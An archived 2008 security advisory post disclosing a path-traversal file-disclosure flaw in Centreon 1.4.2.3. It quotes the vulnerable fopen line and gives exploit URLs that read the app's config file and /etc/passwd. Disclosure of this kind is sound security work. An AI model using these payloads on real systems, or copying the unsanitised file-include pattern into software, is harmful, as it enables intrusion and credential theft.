Centreon <= 1.4.2.3 (index.php) Remote File Disclosure Feb 29 2008 03:27PM
sys-project hotmail com
[+] Info:

[~] Software: Centreon <= 1.4.2.3

[~] HomePage: http://www.centreon.com

[~] Exploit: Remote File Disclosure [High]

[~] Where: include/doc/index.php

[~] Bug Found By: Jose Luis Góngora Fernández|JosS

[~] Contact: sys-project[at]hotmail.com

[~] Web: http://www.spanish-hackers.com

[~] Spanish Hackers Team [SHT]

[+] Bug In include/doc/index.php:

[~] line 33: $doc = fopen("../doc/".$oreon->user->get_lang()."/".$_GET["page"], "r");

[+] Exploit:

[~] /include/doc/index.php?page=../../www/oreon.conf.php

[~] /include/doc/index.php?page=../../../../../etc/passwd

[~] /include/doc/index.php?page=[Local File]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus